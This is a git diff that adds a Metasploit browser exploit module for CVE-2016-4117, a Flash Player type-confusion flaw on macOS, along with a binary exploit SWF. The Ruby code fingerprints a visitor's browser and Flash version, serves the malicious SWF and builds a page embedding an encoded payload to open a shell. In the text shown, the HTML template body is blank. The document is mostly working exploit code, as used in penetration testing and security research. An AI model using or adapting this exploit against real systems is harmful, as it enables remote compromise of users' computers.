diff --git a/data/exploits/CVE-2016-4117/msf.swf b/data/exploits/CVE-2016-4117/msf.swf
new file mode 100755
index 0000000000..f7a99357b2
Binary files /dev/null and b/data/exploits/CVE-2016-4117/msf.swf differ
diff --git a/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb b/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb
new file mode 100755
index 0000000000..0da166b0e6
--- /dev/null
+++ b/modules/exploits/osx/browser/adobe_flash_delete_range_tl_op.rb
@@ -0,0 +1,124 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+ Rank = GreatRanking
+
+ include Msf::Exploit::Remote::BrowserExploitServer
+
+ def initialize(info={})
+ super(update_info(info,
+ 'Name' => 'Adobe Flash Player DeleteRangeTimelineOperation Type-Confusion',
+ 'Description' => %q{
+ This module exploits a type confusion on Adobe Flash Player. The vulnerability,
+ discovered in the wild. This module has been tested successfully on:
+ macOS Sierra 10.12.3, Safari and Adobe Flash Player 21.0.0.182,
+ Firefox and Adobe Flash Player 21.0.0.182.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'bcook-r7', # Imported Metasploit module
+ ],
+ 'References' =>
+ [
+ ['CVE', '2016-4117'],
+ ['URL', 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4117'],
+ ['URL', 'https://www.fireeye.com/blog/threat-research/2016/05/cve-2016-4117-flash-zero-day.html']
+ ],
+ 'Payload' =>
+ {
+ 'DisableNops' => true
+ },
+ 'SessionTypes' => ['shell'],
+ 'Platform' => ['osx'],
+ 'BrowserRequirements' =>
+ {
+ :source => /script|headers/i,
+ :os_name => lambda do |os|
+ os =~ OperatingSystems::Match::MAC_OSX
+ end,
+ :ua_name => lambda do |ua|
+ case target.name
+ when 'Mac OS X'
+ return true if ua == Msf::HttpClients::SAFARI
+ return true if ua == Msf::HttpClients::FF
+ end
+
+ false
+ end,
+ :flash => lambda do |ver|
+ case target.name
+ when 'Mac OS X'
+ return true if Gem::Version.new(ver) <= Gem::Version.new('21.0.0.182')
+ end
+
+ false
+ end
+ },
+ 'Targets' =>
+ [
+ [ 'Mac OS X',
+ {
+ 'Platform' => 'osx',
+ 'Arch' => ARCH_X64,
+ }
+ ]
+ ],
+ 'Privileged' => false,
+ 'DisclosureDate' => 'Apr 27 2016',
+ 'DefaultTarget' => 0))
+ end
+
+ def exploit
+ @swf = create_swf
+
+ super
+ end
+
+ def on_request_exploit(cli, request, target_info)
+ print_status("Request: #{request.uri}")
+
+ if request.uri =~ /\.swf$/
+ print_status('Sending SWF...')
+ send_response(cli, @swf, {'Content-Type'=>'application/x-shockwave-flash', 'Cache-Control' => 'no-cache, no-store', 'Pragma' => 'no-cache'})
+ return
+ end
+
+ print_status('Sending HTML...')
+ send_exploit_html(cli, exploit_template(cli, target_info), {'Pragma' => 'no-cache'})
+ end
+
+ def exploit_template(cli, target_info)
+ swf_random = "#{rand_text_alpha(4 + rand(3))}.swf"
+ target_payload = get_payload(cli, target_info)
+ b64_payload = Rex::Text.encode_base64(target_payload)
+
+ if target.name =~ /osx/
+ platform_id = 'osx'
+ end
+ html_template = %Q|
+
+
+
+
+
+
+
+
+
+
+ |
+
+ return html_template, binding()
+ end
+
+ def create_swf
+ path = ::File.join(Msf::Config.data_directory, 'exploits', 'CVE-2016-4117', 'msf.swf')
+ swf = ::File.open(path, 'rb') { |f| swf = f.read }
+
+ swf
+ end
+end